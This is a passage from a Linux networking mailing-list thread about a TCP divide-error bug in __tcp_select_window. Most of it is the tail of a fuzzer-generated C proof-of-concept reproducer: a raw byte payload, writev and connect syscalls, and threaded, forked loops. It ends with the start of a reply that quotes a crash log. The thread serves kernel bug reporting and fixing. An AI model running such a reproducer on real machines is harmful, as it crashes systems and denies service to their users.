"\x11\x43\xfa\x44\x8b\xd7\xae\x7d\x52\xed\x6a\xe6\xe6\x70\x57"
"\x28\x02\x88\xc5\x91\xc0\x28\x85\x50\xb9\xf8\xee\x0f\xc6\x94"
"\x7a\x9d\x30\x27\x30\x0f\x5d\xa9\x8e\x82\x8a\x5d\x89\x1a\xb3"
"\xd7\xec\x50\x96\xd5\xc2\x22\x95\x94\x30\x30\x38\xb7\x44\x0e"
"\x02\xb7\xae\xd8\x7e\xb9\xaf\xca\x82\xd5\x07\x9c\x53\x1b\x41"
"\x8c\x82\xcc\x77\xf4\x61\x81\xc4\xac\x15\xfb\x6b\x8f\x98\xac"
"\x06\x51\x4c\x77\xf4\x1e\xce\x00\xac\x1d\x83\x1b\x12\xd7\x73"
"\x96\x55\x62\x95\x8d\x7f\x3c\x3e\x72\xf3\x43\x1a\x2b\x78\xbb"
"\x6c\x19\xb8\x31\x10\x14\x09\xd1\x3c\x8d\x26\x69\x8c\x13\x37"
"\x77\x4a\x26\xd7\xab\xfe\xff\x93\xa3\x4b\xdb\xc5\x04\xe8\x3b"
"\x11\x6a\xc8\x2e\xd2\xc1\xd2\x6f\x21\xdc\x0a\xf1\x0e\x23\xc9"
"\xb8\x6a\xe6\x3b\x67\xf9\x3f\xcb\xaf\xbe\x66\x77\xc9\x85\xb7"
"\x36\x86\xb9\x26\xdd\x4e\xea\x72\x79\xae\x96\x81\x3d\xb4\xce"
"\x1e\xa8\x52\x29\xd2\xe1\x12\xc8\x42\xd6\x92\x00\x23\x7b\xd3"
"\x64\xe2\xdc\xb8\x28\xfb\x1d\x66\x00\x07\x2c\x1a\x06\x0e\x7a"
"\x5d\x38\xf0\x35\x22\xd6\xbb\xdf\xbf\xe6\x67\xff\x76\x17\x4f"
"\xbe\xc1\x2e\xbb\x36\x28\x7f\xd0\x63\xdd\xb6\x8d\x3f\xef\x85"
"\x96\x5c\xcc\x26\x1b\x27\x7b\xe0\xbb\x04\x77\xad\x67\x7e\xd3"
"\x5f\x8c\xf9\x20\x0d\xd5\xe8\x69\x9a\x03\xba\x00\x05\xbf\xae"
"\x4a\x74\xf4\x9c\xd5\x43\xde\xdd\x9f\x45\xff\x55\x8d\xa1\x22"
"\x2e\x84\xae\x51\x31\xa7\x2b\xf8\xf7\xb7\xe9\xa1\x79\xb8\xe3"
"\x0b\x6f\x68\xe1\x06\x41\x0d\x80\x56\xd8\x0d\x35\xd8\x1a\x93"
"\xe7\x12\xb9\xd2\xc8\x41\x1b\x09\x90\xdc\x28\x6d\x40\x24\x10"
"\x58\xed\x08\xf2\x7c\xff\x3b\xbd\x44\x93\x2f\x24\xa8\xeb\x72"
"\x6b\x1c\xca\x93\x05\x10\x30\x0b\xf3\x06\x57\x45\x16\x52\x1d"
"\x62\x8b\x47\x42\x55\x0c\x31\x2a\xc8\xdf\xee\x3c\x34\xd1\x6d"
"\x03\xfd\xa9\x96\xb3\xe2\xdb\xc7\x70\x61\x02\x50\xd2\x55\x92"
"\xc1\x0b\xb2\x78\x15\x9f\xc9\xac\xfe\xc0\x7b\xfa\x51\x4d\x17"
"\xfd\x25\x21\x18\x77\x0c\x15\x94\x7e\xf2\xa4\x6b\xf3\xd1\x4a"
"\x47\xe4\x07\xfb\x2f\xaf\x38\x7d\xb9\x12\xf1\x6f\x70\x87\x81"
"\x09\x69\x74\xea\x83\x83\xc9\x8d\x71\xa8\xc8\xf1\x45\xd7\x4d"
"\x2c\xf2\x20\xb3\x7b\x99\xe7\x48\x84\x3e\x27\x1c\x24\xa4\xbf"
"\xf3\x37\x22\x93\xda\xf0\x5d\x40\x94\x35\xad\xe8\x33\xa5\x2d"
"\x42\x90\x1e\x99\xf7\xe5\x17\x70\xdc\x72\x2d\xfe\xe9\xe1\xe9"
"\xf9\xac\xfa\xb2\xf7\x44\xe7\x82\x55\xea\x13\xb1\x5d\x68\x1c"
"\x34\x52\x88\xd3\xa2\x23\xbb\x04\xb2\x2c\xad\x80\x64\xa5\x0f"
"\xfd\x22\xab\xb1\xac\x33\x8f\xc1\x80\x45\xe8\xee\xd0\x54\x45"
"\x9f\xd2\x74\x54\x0f\xc7\x45\x4f\x87\x9e\xcd\xd0\xef\xd7\x61"
"\x5a\x85\x30\xcd\xbd\x4b\xf7\x00\xad\x9c\xb6\x54\xc3\x16\x6c"
"\x64\x13\x70\x01\x8f\xed\xc3\x12\xe4\xff\x58\xf9\x2d\x73\x63"
"\xa4\x8c\xcd\x12\x42\x16\x4a\xd9\x85\x15\x4e\x1b\xb3\xd6\xea"
"\x93\x12\x7a\x3e\xd4\x79\x4a\xa5\x01\xc4\x83\xd6\x53\x57\xa9"
"\xf8\xa5\x6a\x5a\x2c\x91\x28\x80\xad\x61\x32\x23\x16\xb4\xee"
"\xa5\xd5\xa7\xc0\x15\x62\xf6\x2d\xf9\x82\xc0\x9d\xa1\x10\xd2"
"\xc8\x02\x9e\x3c\xb4\xee\xa5\xb6\x99\x89\x9f\xef\x1a\xb1\x1b"
"\x55\x2a\x9a\x5e\x5e\xce\xb9\xa1\x21\x96\x23\xf3\x22\xfc\xbf"
"\xfe\x62\x12\x68\xb4\xb9\xc5\x7e\x5e\x61\x0c\x72\x11\x73\x6c"
"\x9f\xee\xce\x63\xf7\xdf\x6e\xc5\x05\x9a\x13\x47\x92\x2d\xad"
"\xe2\x7b\xc4\x23\x94\xec\xa5\xf0\x9c\x82\xbe\x82\xbd\xd1\xc3"
"\x81\x64\x74\x95\x7e\x34\xeb\xf2\xe4\x0e\x1f\x30\x3d\x26\xaf"
"\xc7\xf0\x9a\xb9\x3c\x0a\xce\xec\x5b\x25\x6e\x66\xf7\x7f\x58"
"\x55\x81\x37\x33\x9e\x42\x62\xb0\x50\xfe\xab\x43\x6c\x6d\xc9"
"\x99\xa0\x50\x70\x75\x80\x6a\x2d\xca\xa0\xa9\x32\x38\xfd\x23"
"\xd6\x17\xb2\xb5\x90\x3d\xa2\xc1\xcb\x0d\x2d\x84\x0e\xbf\x48"
"\xa6\x7b\xa2\xfd\x46\x27\x85\x11\x16\x6c\x79\xa9\x41\x06\x54"
"\xd0\x5b\x71\xba\xd8\x82\xcf\x6d\x00\x36\x85\xaa\x75\x89\xaf"
"\xaf\xbe\xc9\x59\xfc\x48\x1c\x7c\x0c\x25\xbc\xe4\xc5\x35\x24"
"\x26\xf3\x22\xf2\x52\x5f\x87\x25\x4a\x8f\x38\xff\x27\xd3\xd9"
"\xe8\x78\xda\x52\xf4\x4c\xe5\xa2\xa3\x44\xf9\x93\xeb\x37\x85"
"\x4e\xda\xa5\x93\x18\x3a\xed\x1e\xed\x3e\x42\xd6\x07\x62\xb3"
"\xf2\x9d\xa9\x4e\x32\x0b\x7c\x5a\x15\xd6\xd2\xde\x08\x5e\x1c"
"\x0d\x6b\xd7\x47\x4e\x5f\xa3\x20\xd1\x5e\x0f\xff\xc3\xce\x1e"
"\xf7\xe9\xdf\xfe\xda\xb9\xd0\x9c\x01\x5e\x88\x61\xcb\xba\xf8"
"\xab\x8d\x43\xc2\x6b\xbe\x6e\xb6\xbc\xc2\x94\x9e\x95\x5f\xb0"
"\x67\x8f\xee\x23\x0a\xfe\xdb\x20\xd6\x90\x12\x64\x71\x3c\x7d"
"\x04\x7a\xc3\xe5\x05\x20\x80\x59\x6b\xb6\x08\x5b\xa7\x44\x72"
"\x5a\x0c\x9b\x1f\xb0\x95\x91\x98\xe9\x4f\x87\x50\x64\x99\x49"
"\x2d\x32\xc5\xd2\x37\xca\x27\x40\x3f\x9e\x6b\xf9\xad\xe8\xdd"
"\x3c\xe7\x2a\xc2\x42\xe8\xd1\x39\x30\xf0\x05\xd2\x32\x83\xfb"
"\x75\x72\xfd\xc1\x75\x09\x7e\xe6\x26\x6a\xac\x7f\xae\xe3\xc1"
"\x25\x7f\xba\x08\x10\xd8\xf2\x7f\xea\xde\x17\x4e\x24\x72\xc0"
"\xaa\xa6\xec\xc8\x5c\x89\x03\xbc\x2f\xc3\x74\x47\xa7\x14\xcc"
"\x93\xfe\x70\xc3\xa0\x46\xbc\x3a\x5e\xa7\xa4\xf0\x5c\xd6\xea"
"\xd6\x3b\x02\xb9\x8e\x16\xe7\x1a\x12\xee\x07\xf8\x1b\x9c\x1a"
"\x51\xfb\xdd\xad\xa7\xab\x43\xf5\xf4\x17\x2f\x04\x69\xa3\x67"
"\x1a\x20\x38\xd8\x51\x8b\x0e\x87\xb2\x10\xf9\xec\xb3\xf3\x03"
"\xd9\x00\x86\x69\xdc\x80\x62\xf1\x6f\x91\x54\x4f\x77\x89\x54"
"\x6c\x7c\x6e\x3c\xaa\xf9\xd8\xb7\x0c\x61\x73\xfd\x06\x88\x26"
"\x8f\x01\x81\xc2\x8d\x80\xb0\x8c\x91\xac\x27\xd3\x22\xc9\xdf"
"\xb6\xfa\xd2\x61\x2e\xee\xb3\xb2\x73\x13\x22\x60\x4c\xd3\x11"
"\xa8\xcd\x76\xf0\x17\x53\x61\x7f\x45\x9d\xae\x43\x75\xd3\x3a"
"\x51\xd0\x47\xc6\x41\x1a\xac\xfe\xd0\xe9\xf5\x90\x3b\xde\x44"
"\x97\x23\x34\x3d\xe2\x46\xcd\x03\xa4\x46\x7a\x02\x21\x3a\xe5"
"\x1f\x9e\xb0\x28\x90\x78\xd3\xab\xf6\x27\x19\x80\x19\xfe\x89"
"\xa0\xc7\x33\xf8\xad\xac\xf1\x79\x98\x30\xd4\x9e\x3d\x2c\x06"
"\xfd\x23\xe9\x1c\x4d\x77\xed\x8c\xf5\xc1\x9f\x9e\x6d\x25\x9b"
"\xce\x7e\x00\x2f\x09\x27\x81\x40\x4a\xe3\xa2\xe4\xa9\xca\x51"
"\x90\xe5\x07\xe8\x83\x70\x2d\x14\xf7\x4c\x49\x1e\x4a\x1a\x44"
"\xb3\x7e\xd4\x6d\x12\xe8\xb5\xf3\x53\xb6\xa3\x7e\xca\xbd\x3e"
"\xc0\xf4\x7e\x2c\x63\xbd\x8b\xde\xee\x77\x52\xae\xf7\x60\x3a"
"\x8b\x22\xeb\xc3\x3c\x97\x72\x68\x37\x57\xf3\x9a\xb2\x73\xdc"
"\xb8\xfc\x58\x3d\x33\x81\x12\xe4\x98\x1f\x4e\xb1\x30\x69\xa8"
"\x6b\x9b\xc5\x95\x67\x4a\x76\x40\x4b\x94\x66\x69\x98\x99\x32"
"\x34\x44\x10\x4d\x59\x36\xfc\x28\xa3\xc0\x3c\x42\x4d\x9b\xae"
"\x7f\x01\x30\x5e\x0e\x46\xb2\x83\xfc\x04\xef\xb5\xb8\xd9\x61"
"\x8d\xf5\xce\x15\xbe\x74\x91\x7b\x54\x4a\x72\xe5\xe3\x42\x6b"
"\x06\xbe\xab\x3a\x76\x0a\x72\x3c\x3e\x79\xe6\x8d\xf4\x44\x4f"
"\x2f\xee\x9b\x9b\xbf\x08\x85\x55\xe2\xd6\xa5\xc5\x73\xa9\x85"
"\x96\x62\x4a\xa7\xf5\x4a\xc9\xff\xcc\x3b\xd2\x39\xea\x94\xe5"
"\x18\x17\x34\xe4\xbc\x7e\x4c\x8f\xf4\x51\x92\xe9\x23\xe2\xaf"
"\x29\x1d\x86\x6d\x2b\x96\xf0\xd5\xe3\x76\x52\xd6\x52\xf7\x5c"
"\x37\x11\xb7\xfe\xa6\x0e\x45\x9d\xe3\xab\xf2\x44\x87\xbd\xa0"
"\xeb\x5c\x98\xa0\x8a\x01\x16\xa4\x96\xd1\x77\x72\xe9\xa5\x3b"
"\x3e\x8a\x8f\x5e\xef\xa4\x15\xf8\x04\x31\x4e\x60\x80\x0d\x54"
"\x29\xe7\x2f\x6d\x14\x60\xe0\x71\xb6\x6f\x63\x55\xe2\x7d\x05"
"\x80\x5a\x63\xf5\x56\x44\x66\x88\xea\xf1\xfa\xfd\x6d\xc9\x78"
"\xb5\xd1\x4c\x0e\x25\x19\xe0\x6c\xf4\x51\x13\x03\x4c\x35\x16"
"\xb4\x0c\xc5\x11\x58\x18\x76\x91\xf0\x51\xb0\x25\x41\x7a\xef"
"\x36\xfe\xa5\x84\xcf\xd4\xa0\x78\x7e\x9d\x2a\x79\x3f\xc4\xd4"
"\xe2\x63\xe1\x8a\x2f\xdc\x38\xa9\xf4\x0f\xa5\x0d\x29\xcc\x97"
"\x57\xd4\x54\xeb\x49\xa9\x56\x8d\xca\x31\x49\x5c\x6c\x58\xe9"
"\x82\x77\x49\x82\x68\x83\x0e\x03\xdc\xe8\xf1\xff\x4a\x40\xff"
"\x7c\x5e\x23\xc6\xa8\x45\x2a\xa1\x44\x22\x46\x9c\x4b\xac\xf0"
"\x17\x81\x06\x7d\x52\xa5\x00\x94\xb0\x93\x35\xe3\x61\x5a\x00"
"\xf6\x30\x72\xfe\xda\x47\x54\xc8\x06\x4f\xe9\xe6\x24\x2a\x83"
"\xe8\x5b\x7e\x33\x58\x3e\x02\xda\x28\xbe\x2d\x34\x62\xb3\x4c"
"\x25\xb9\x7f\x83\x16\x3e\xab\xcf\x4a\x4f\x68\xa9\xbb\x34\x2b"
"\x59\x25\x39\x68\x8f\xbe\x38\x28\xfb\xba\xcc\x9f\x4b\x6b\xa0"
"\x30\x44\x22\x26\x24\x0e\x94\xbb\x97\x71\x97\x71\xf7\x02\x63"
"\xe3\xa3\x83\x0a\x33\x81\xdd\x5d\x09\x17\xff\x12\x99\xa6\xf7"
"\xfa\xd1\xc3\x4c\xa8\x6c\xb1\x32\xcf\x8d\x95\xad\x25\xd8\xf1"
"\x2e\x42\xea\x81\x00\x62\x99\x40\x75\x5d\xbf\x45\x4c\xfb\x5f"
"\x51\xf7\x49\xb9\x22\x0e\xb1\xac\x83\x14\xae\x99\xb6\x30\x59"
"\x86\xc3\x7f\x82\x7c\x9e\xda\x76\xe3\x16\xb0\x7a\x69\xcd\xa8"
"\x63\xf1\x92\x35\xea\x4b\x97\xc6\xe0\x13\x65\xa2\xfd\x04\x7c"
"\xe4\x65\xeb\x53\x4a\xf1\x17\x56\x3c\x5f\xae\x3e\xc8\x9e\xb2"
"\x37\x3c\x8e\xd4\x6b\xca\x1f\x9e\x53\xa1\xa7\x88\xc4\xab\xb9"
"\x8a\xa8\x76\xc7\x0d\xac\xdc\xc0\xc1\x40\x91\x78\x80\xd3\x21"
"\x21\x19\xe0\x75\x1e\x6f\x2f\xfd\x27\x2a\xfb\xdc\x19\xfe\x50"
"\xbf\x0f\x8c\x01\x42\x07\xc1\x28\x77\x8d\x30\x3f\xa6\x7d\xde"
"\x38\xb7\x51\x2a\x55\x83\x01\x33\x68\x16\x65\x81\xba\xb9\x04"
"\x83\x03\xe3\xb1\x34\x7a\x5a\x0a\xa1\x58\xd1\xe3\x15\x47\xc7"
"\xf9\x79\x4e\xa7\x60\xdc\xa7\x46\xe3\x1a\x5d\x6e\x9a\x60\x27"
"\x70\xbe\xe9\x52\xf4\x17\x65\x8c\x82\x13\x28\x81\xf4\x2a\x5c"
"\x05\x74\x89\x68\x06\x1a\x31\x95\x3f\xdc\x2d\x58\x95\x1b\x2c"
"\xb7\x39\x1a\x0f\xde\x13\xca\x1c\xb3\x07\x3e\xb9\x2f\x5d\x1a"
"\x9f\xb5\x12\x15\x28\x65\x91\x2b\xcd\x3f\xf5\x0e\x7c\x0a\xad"
"\x35\x7b\x49\x71\x98\xc7\x5a\x62\x6f\x78\xf8\xc9\x20\x85\x67"
"\x7c\x7d\x9c\xbf\x44\x6c\xd1\x3f\xce\xfc\xda\xc5\xd7\x5e\xad"
"\xf1\x14\xc4\x68\x2c\x7e\x67\x19\x7a\xcd\x24\x31\xdb\x0c\xd5"
"\x40\x4d\xf1\x3a\x1a\x2c\x69\x4b\x2c\x38\x1a\xaf\xab\x9e\x6f"
"\x99\xa6\xab\x5d\x15\x76\xde\xb3\xaf\x91\x74\x8a\x25\xf5\x18"
"\x4c\x79\x9b\xa8\x78\x4f\xd6\xd6\xa7\x30\x66\x6b\x15\x7c\x47"
"\x94\xd6\xf4\x57\x4e\x90\x8f\x89\x7c\xa7\xb4\x2c\x04\xc3\x36"
"\xcd\xcf\x01\x97\xbc\x9c\x29\x94\xb1\x4f\x0c\x68\x01\x87\xf9"
"\x7b\x1b\x1d\xdf\x8b\xf3\xcc\x8d\x06\x3f\xb5\x18\x85\xf7\x00"
"\x6a\xc4\x1c\x1e\x86\xaa\xed\xd3\x41\x7c\x0b\x4d\x44\xdb\x48"
"\x0e\x4f\x63\xc3\x5c\xc1\x18\xf7\x14\x86\x39\xd0\xa6\xa7\xd1"
"\x97\xce\x8e\x5e\xf9\xcb\x1a\x8c\x82\xa6\xb8\x37\xeb\x06\xf9"
"\x38\x57\x2e\xfc\x43\xa7\x85\x17\xde\x3b\x95\xd0\x35\x0a\x8c"
"\x09\x56\x6d\x06\xa2\x1b\x3f\xb7\xb0\xfc\x31\x2d\xc3\xb3\xfc"
"\x64\x91\x70\xcc\x2b\x42\x3c\x76\x8f\xaf\x0f\xeb\x96\x36\x85"
"\xd0\x12\x4d\x05\xbe\xca\x67\x83\x79\x54\x5c\xe8\x21\x58\xfa"
"\xda\x3d\x73\x54\x85\xc6\xff\xf5\x94\xd0\x9a\x06\xac\x3e\x4d"
"\xdf\xf0\x4f\x82\x16\x6c\x15\x1e\x95\x04\x29\xa8\x87\x4a\xd6"
"\x82\x5a\x97\x1c\xa0\x74\xf4\x81\x23\xd9\x96\xc8\xb7\xfb\xa4"
"\x48\x43\x95\xb0\xe0\x50\x0c\x6a\x26\x51\xc2\xe5\x3a\x85\x94"
"\x21\xae\x16\x9a\xd0\xf8\x93\x85\xa4\xa0\x82\x09\x8c\x5d\x59"
"\xd7\xc6\xa1\xe0\x98\x5c\xdb\x4a\x70\x8b\x72\x51\x47\xae\x6a"
"\x42\x10\x06\x0a\x9d\xad\xc0\xf9\x1a\x62\xbe\xe3\x12\x51\xe7"
"\x2f\x0d\x18\x5f\x13\x41\xa0\x72\x20\x99\x22\x50\x9c\x18\x9e"
"\xe5\x09\xdc\x42\xfb\xcd\x49\x7c\xd3\x79\x0b\x7d\x09\x4e\x6d"
"\x79\x21\xf6\x12\x1b\xfc\xf7\x0d\x93\x73\x4e\xd4\x5d\xbd\x14"
"\x85\x9b\xa8\x15\xd1\x4d\x38\x11\xb7\x4c\x10\x83\xde\x8f\x8e"
"\x68\x0e\xb0\xe5\x2d\xe9\xc7\xea\x9c\x7f\x09\x2b\xc7\xa3\x13"
"\x24\xef\xae\xb0\x4d\x67\x40\x41\x27\x03\x4a\x5f\x77\x51\x26"
"\xe3\x07\x7f\xd5\x97\x2d\x10\x31\x07\xa8\x61\xed\x71\xd8\xd6"
"\x3f\xa8\xa0\xc1\x1c\xda\xb6\xcd\x50\xfc\xde\xeb\xe7\x71\x91"
"\xf7\x4b\x1d\x82\xd7\x40\x28\xc3\x34\x20\x2d\xcf\x6b\x60\x2a"
"\xeb\xde\xf7\x40\xab\x6f\x1c\xea\x51\xc8\x77\xd1\xb7\xd0\x13"
"\x0e\xc4\xb6\x10\xb9\xca\xe3\xf7\x82\xb9\xae\xcf\xd8\x5e\x1c"
"\x89\x6f\x5f\x5b\xf8\x2d\x58\x08\xca\xe2\xa7\xc8\x4a\xf4\x11"
"\x4d\x97\x1f\xc2\x06\x97\x4a\x0f\xe6\x64\xc6\xf6\xe0\xd1\xee"
"\x6a\x64\x33\xf1\xf4\xf7\x44\x10\x32\xde\xd4\x17\xf1\xfb\x54"
"\x3a\x0e\xcc\xca\x37\xc0\x0d\xe5\xc4\x96\xd3\x2d\x6b\xf4\x7b"
"\x79\x62\xc2\x7a\x44\x31\xc7\x87\x32\xae\x95\x82\xb3\x4c\x26"
"\x3f\x64\x97\x90\xf5\xfe\xfb\x38\x12\xed\x5f\x98\xf0\x04\x7c"
"\x15\xed\x60\x50\x8c\x11\xb8\xd3\x29\x0a\x6a\xb3\x2a\x19\x45"
"\x82\xca\xe0\xf8\x2d\x9d\xc7\x8f\xbf\x3d\x32\x65\x06\xf4\x90"
"\x6b\x14\x78\xaa\xe1\x3b\xef\xed\xe1\x0d\xe5\x00\xf8\x72\x96"
"\x83\x1c\x92\xaa\xfd\x02\xe8\x5c\x4a\xe8\x47\xad\x9f\xb7\x20"
"\x8a\xf6\x2e\x35\x46\x46\x84\x6b\xf4\xe4\x6f\xcd\xc3\xef\x36"
"\x8e\x21\x02\xf2\x33\xa5\xfe\x7a\x63\x62\x92\x14\xcf\xdf\x02"
"\x6f\xd3\x79\x8f\x04\x2a\xf8\xe2\x3e\x34\x98\x75\x94\xda\xe8"
"\xf4\xf8\xdb\x0f\x0b\x42\x0c\x64\xfc\x11\xc8\xc4\x44\x8b\x82"
"\x23\x27\xe2\xa7\xaa\x28\xbb\x98\xf6\xd3\xad\xdb\xf0\xab\x79"
"\xee\xb1\x46\x0f\xd1\x15\x82\x41\x04\x44\xe2\xbb\xcb\x1a\xa3"
"\xac\xdd\x35\x39\x22\xd3\x89\xb9\xbf\x7f\xae\xae\x8a\x8f\xc8"
"\xcb\x56\x4d\xde\x6a\x5d\xe1\x50\x99\x72\x56\x7b\x84\xc8\x5b"
"\x5a\x05\xd4\xc1\x5b\x66\x55\x31\x84\x86\x05\x0d\x8a\x2c\xdf"
"\x28\x30\xa6\x1e\xcc\x2a\x4f\x10\xee\xb7\x16\x89\x80\x05\xae"
"\x91\xcd\x1f\x97\x28\xe7\xed\x59\x89\xb5\xdd\x5d\x20\x10\x8e"
"\x80\xab\x63\x25\xa4\x03\x4f\x08\xd2\x5a\xeb\x83\x60\x3a\xb0"
"\xe4\x49\xd8\x61\x83\x1b\x75\x1f\x6e\x3b\xdb\xb7\x75\x94\x78"
"\x48\x1d\xc0\x46\x11\xd5\xde\xd4\xef\x4b\xbb\x29\x5a\x75\xb7"
"\x86\x08\xa6\xbd\x74\xaa\x27\x0f\x6b\x4f\xf0\xca\x7e\x5f\x35"
"\x4d\xf3\xdb\x4a\x81\xdb\x9c\x75\xe1\x5d\x40\x9f\x8d\x3f\xd0"
"\x2c\x45\x53\x50\x4e\xfe\x3e\x03\xea\x05\x88\xb1\x06\x79\x86"
"\x9d\x13\x18\x8d\xa8\xf0\x03\xd4\xc9\x89\x3c\xe2\x45\x22\xf8"
"\x10\x43\x92\xdb\x3d\xdc\xa0\x89\x57\x8b\x76\x91\x91\x30\xc7"
"\xde\x51\xf5\x71\x33\x54\xda\x62\xb3\x16\xda\x76\xa4\x32\x87"
"\xf0\x79\x24\xc0\x6f\x91\x2d\xe9\x34\xd4\x24\x39\x01\xe1\xf2"
"\x68\x53\xf3\x71\x02\x29\x7d\x84\x64\x02\x77\x18\x0e\xc0\xd1"
"\xd7\xfe\xd1\xf7\x85\xa0\xbb\x2f\xc4\x63\xad\xc7\x21\xe6\xed"
"\xa7\xf7\x8a\x72\x90\xd5\x9e\x39\x23\x32\x27\x32\x2e\xaa\xa5"
"\x67\x9a\xac\xd8\xa4\xd9\x4c\x47\xc2\x38\x6a\x0d\xe7\xee\xef"
"\xb1\x93\x13\x2a\xce\x9f\x05\x4d\x65\x60\x25\x30\x9f\x67\xac"
"\x8c\x70\xbd\x48\x76\xad\x97\x9a\x0e\xf5\xf2\xa0\x61\xbc\xdb"
"\xda\x29\xbe\x14\x18\x18\xaf\xc3\x76\x6d\x92\xc5\xf7\x3e\x4d"
"\xb4\x26\xdb\x60\x39\x80\xc2\x14\xc5\xe4\x99\x35\x25\xf9\x48"
"\x72\xd9\x05\x52\x62\x33\x39\xb2\xc7\x06\x18\x8c\x25\xcf\x7b"
"\xe2\xf4\x5e\xb3\x21\x36\x7e\x0d\x8a\xd4\x7b\x67\x69\x34\xc0"
"\x3f\x77\x1f\x11\x67\xb5\x57\x5e\x6d\xfe\x97\xf5\xe2\x05\x38"
"\x41\xda\x7d\x7d\xe8\x77\xab\xdf\x0f\x5a\x00\x60\x47\x34\xda"
"\xb1\x3d\x09\x65\xe4\xd7\x9f\xbc\xe9\x69\x40\x19\x1d\x4d\x85"
"\x52\xd6\xa3\x59\xb0\x47\xcb\xc7\x60\x01\x7d\x2e\x36\x50\x39"
"\x38\x27\x1b\x20\xc7\x65\xb3\xe8\x54\x9b\x65\xbf\x87\x38\x1b"
"\x57\x10\x58\xa9\x34\x96\x57\x53\xc9\x00\xda\xe4\x9c\x2f\x65"
"\xbb\x3b\x32\x91\x7c\x0f\xb7\xb6\x1e\xba\x5b\xe0\xb4\xa1\x06"
"\x63\x70\xba\x55\x7f\x18\x50\xdb\xa5\xa6\x93\x15\x10\x14\x27"
"\xe2\xee\xd7\x69\x4c\x66\x07\x86\x46\x0f\x2f\x61\x05\x5f\x74"
"\x58\xa8\x19\x85\x9e\x89\x17\x0f\x96\xea\x65\x0a\xaa\x32\x33"
"\x15\xca\x5c\x75\xbb\x79\xa9\x1e\xf7\xa1\x2c\x56\xd8\x25\xad"
"\x91\x0c\x38\x7c\x69\x8c\xda\x14\xac\xc6\xd7\xc7\x62\x62\xf0"
"\x25\x23\x87\x27\x28\xed\x13\xc2\x98\xe1\x5c\x70\xa3\x32\x94"
"\x9c\x79\x75\x50\xb5\x48\xcb\x99\xd4\x79\x41\xb8\x1e\xae\x39"
"\x57\x8f\x88\xb5\x19\x6a\x8e\x07\xca\xf6\xd3\x47\x82\x14\x07"
"\xfc\x82\x2f\x70\xf1\xf6\x04\xe6\x5d\xf8\x4d\xe8\xb8\x23\xef"
"\xe4\x79\xf7\x20\x64\x95\x1a\x2d\x8a\x87\x91\x31\x63\xfa\xdc"
"\xbe\x42\xd1\x5e\x79\x27\x0f\x7b\x3b\x52\xce\xe6\x3b\xd0\x98"
"\xed\xbb\xc6\x4d\x01\x4c\xf1\x90\xe6\xfe\x7d\x39\x28\xe6\x05"
"\xd0\xbd\x4e\xcb\x5a\x83\x2b\x7a\x45\xcb\x76\x37\x42\xee\xb9"
"\xd0\xea\xb8\x0f\x5d\x1a\xf3\x65\x82\x02\xe2\x8d\x6d\x8f\x21"
"\xf0\xa8\x70\xd6\x36\xde\x09\x95\x90\xa4\x29\xe4\x1c\xf2\x4e"
"\xa5\x8b\x15\xf0\x9c\xb0\x98\x0f\x82\x73\x2e\x65\x71\x43\x94"
"\x77\x83\xd6\x81\x6b\xcd\x60\xba\x9f\xfd\x10\x3e\xaa\x01\xf3"
"\x08\x7e\x55\x85\xba\x91\xc7\xca\x02\x93\x01\xa0\x95\xf8\x56"
"\x96\xfe\x46\x03\xfd\xfa\x25\xab\x5d\xa3\x2b\xf3\xa4\xd2\x18"
"\xfa\x1a\xaf\x94\xf4\x51\xef\xea\x79\x20\x13\xee\xff\x33\x35"
"\xcf\xe8\xb1\x3b\xee\x3c\x7d\xae\xcd\xaa\xea\xd4\xc6\x05\x94"
"\x01\xbd\xaa\xa6\x5b\x8c\x3d\x99\xcb\x9e\x8f\x2b\xf5\x07\xb9"
"\x8b\x3c\x87\x08\xb1\x6b\x04\x59\x05\xff\xd4\x1c\x58\x04\xb0"
"\x96\x37\x14\x5f\x24\x68\x19\x91\x41\x07\x34\x9a\x0b\xd9\xf5"
"\x07\x35\x0b\xb4\x87\x35\x22\x8d\x47\x9c\x91\x59\x19\xfd\xe8"
"\xe2\x11\xe6\x1f\xb0\x6e\xa2\xc1\x61\x18\x79\x5a\xcc\x72\x81"
"\xa5\x47\x2e\x2e\xb0\xd9\x16\x58\x90\xb0\xbf\x02\xd1\x99\x30"
"\x7a\x5b\x59\xf2\x61\xe5\x0f\x16\x29\x2e\x58\x58\x26\x96\x7f"
"\xc9",
4096));
r[199] = syscall(__NR_writev, r[1], 0x20007000ul, 0x7ul);
break;
case 12:
NONFAILING(*(uint16_t*)0x2001c000 = (uint16_t)0x2);
NONFAILING(*(uint16_t*)0x2001c002 = (uint16_t)0x224e);
NONFAILING(*(uint32_t*)0x2001c004 = (uint32_t)0x20000e0);
NONFAILING(*(uint8_t*)0x2001c008 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c009 = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00a = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00b = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00c = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00d = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00e = (uint8_t)0x0);
NONFAILING(*(uint8_t*)0x2001c00f = (uint8_t)0x0);
r[211] = syscall(__NR_connect, r[1], 0x2001c000ul, 0x10ul);
break;
}
return 0;
}
void test()
{
long i;
pthread_t th[26];
memset(r, -1, sizeof(r));
for (i = 0; i < 13; i++) {
pthread_create(&th[i], 0, thr, (void*)i);
usleep(rand() % 10000);
}
usleep(rand() % 100000);
}
int main()
{
int i;
for (i = 0; i < 4; i++) {
if (fork() == 0) {
install_segv_handler();
use_temporary_dir();
loop();
return 0;
}
}
sleep(1000000);
return 0;
}
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: net/ipv4: divide error in __tcp_select_window
2017-08-31 5:56 net/ipv4: divide error in __tcp_select_window idaifish
@ 2017-08-31 11:11 ` Neal Cardwell
2017-08-31 19:25 ` David Miller
0 siblings, 1 reply; 4+ messages in thread
From: Neal Cardwell @ 2017-08-31 11:11 UTC (permalink / raw)
To: idaifish
Cc: David Miller, Alexey Kuznetsov, Netdev, syzkaller, Wei Wang,
Eric Dumazet
On Thu, Aug 31, 2017 at 1:56 AM, idaifish <idaifish@gmail.com> wrote:
> Hi:
> This bug seems still can be triggered by the attached PoC on latest
> Ubuntu1604 (4.4.0-94-generic)
>
> ============================================================================
> divide error: 0000 [#1] SMP KASAN
> Modules linked in:
> CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
